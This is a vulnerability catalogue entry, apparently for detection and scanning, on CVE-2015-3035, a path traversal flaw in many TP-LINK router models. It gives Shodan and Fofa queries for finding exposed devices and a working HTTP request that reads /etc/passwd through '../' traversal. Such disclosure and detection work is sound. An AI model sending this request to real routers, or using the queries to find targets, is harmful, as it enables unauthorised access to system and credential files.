| Title | TP-LINK - Local File Inclusion |
|---|---|
| Author | 0x_Akoko |
| Severity | High |
| Impact | An attacker can read sensitive files on the TP-LINK router, potentially leading to unauthorized access or disclosure of sensitive information. |
| Remediation | Apply the latest firmware update provided by TP-LINK to fix the local file inclusion vulnerability. |
| CVSS Score | 7.8 |
| EPSS Score | 0.92856 |
| CVE ID | CVE-2015-3035 |
| CWE ID | CWE-22 |
| Shodan Query | http.title:"TP-LINK"http.title:"tp-link" |
| Fofa Query | title="tp-link" |
| Tags | cve2015 cve router lfi seclists tplink kev tp-link vkev vuln |
TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310. Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.
GET /login/../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-3035.yaml
🦈 Packet Capture: ⬇️ Download cve-2015-3035.pcap
N/AN/A